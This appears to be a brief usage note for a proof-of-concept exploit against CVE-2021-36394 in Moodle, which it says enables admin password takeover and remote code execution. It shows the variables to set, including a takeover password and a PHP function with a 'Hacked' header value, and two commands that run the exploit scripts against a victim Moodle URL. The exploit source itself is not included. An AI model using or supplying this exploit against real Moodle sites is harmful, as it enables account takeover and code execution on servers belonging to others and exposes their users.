
Proof-of-concept exploit for CVE-2021-36394 in Moodle, enabling admin password takeover and remote code execution via custom PHP functions.
Custom Code
$newpassword = "Accounttakedover123";
Then Execute:
$ CVE2021-36394.php http://victim/path_to_moodle
Custom Code
$function = "header"; $param = "Hacked: by0d0ff9";
Then Execute:
$ CVE2021-36394_RCE.php http://victim/path_to_moodle